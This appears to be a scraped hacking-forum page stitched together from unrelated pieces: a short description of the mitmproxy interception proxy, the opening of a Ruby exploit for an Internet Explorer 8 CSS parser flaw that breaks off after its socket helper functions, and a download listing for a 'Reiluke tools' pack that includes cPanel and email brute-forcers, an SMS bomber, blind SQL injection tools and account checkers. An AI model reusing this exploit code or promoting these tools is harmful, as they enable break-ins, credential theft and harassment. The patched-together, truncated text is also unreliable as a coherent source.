mitmproxy


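mitmproxy is an SSL-capable HTTP proxy that can be used to debug HTTP traffic, carry out man-in-the-middle attacks, and so on. mitmproxy provides a console interface for intercepting and editing HTTP packets on the fly. mitmdump is the command-line version of mitmproxy and offers the same functionality.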

Link: http://www.mitmproxy.org/

Main features of mitmproxy:

Intercept and modify HTTP traffic on the fly

Save HTTP conversations for later replay and analysis

Replay both HTTP clients and servers

Make scripted changes to HTTP traffic using Python

SSL interception certs generated on the fly


Internet Explorer 8 CSS Parser Exploit Code

#!/usr/bin/env ruby 
 
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ 
# Author: Nephi Johnson (d0c_s4vage) 
 
require 'socket'
 
def http_send(sock, data, opts={}) 
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} 
    opts = defaults.merge(opts) 
 
    code = opts[:code] 
    message = opts[:message] 
    type = opts[:type] 
 
    to_send = "HTTP/1.1 #{code} #{message}\r\n" + 
              "Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" + 
              "Cache-Control: no-cache\r\n" + 
              "Content-Type: #{type}\r\n" + 
              "Pragma: no-cache\r\n" + 
              "Content-Length: #{data.length}\r\n\r\n" + 
              "#{data}"
    puts "[+] Sending:"
    to_send.split("\n").each do |line| 
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
 
def sock_read(sock, out_str, timeout=5) 
    begin
        if Kernel.select([sock],[],[],timeout) 
            out_str.replace(sock.recv(1024)) 
            puts "[+] Received:"
            out_str.split("\n").each do |line| 
                puts "    #{line}"
            end
        else
            sock.close 
            return false
        end
    rescue Exception => ex 
        return false
    end
end
 
def to_uni(str) 
    res = ""
    str.each_byte do |b| 
        res << "\x00#{b.chr}"
    end
    res 
end

Reiluke tools (includes sqliHelper 2.7)

File List:

2009-02-12  09:33    <DIR>          admin finder
2009-02-16  10:25    <DIR>          blind Sqli
2009-02-12  10:03    <DIR>          cpanel bruteforcer
2009-02-12  09:53    <DIR>          duplicate remover
2009-02-12  09:52    <DIR>          email brute
2009-02-16  10:25    <DIR>          email checker
2009-02-12  10:01    <DIR>          exploit scanner
2009-02-12  10:04    <DIR>          php rapidshare checker
2009-02-12  09:57    <DIR>          rapidshare checker
2009-02-12  09:36    <DIR>          sms bomber
2009-02-12  09:54    <DIR>          sqli column counter
2009-09-01  10:50    <DIR>          sqliHelper 2.7
2009-02-12  10:02    <DIR>          steam checker

Download link 1, Download link 2 (official link)
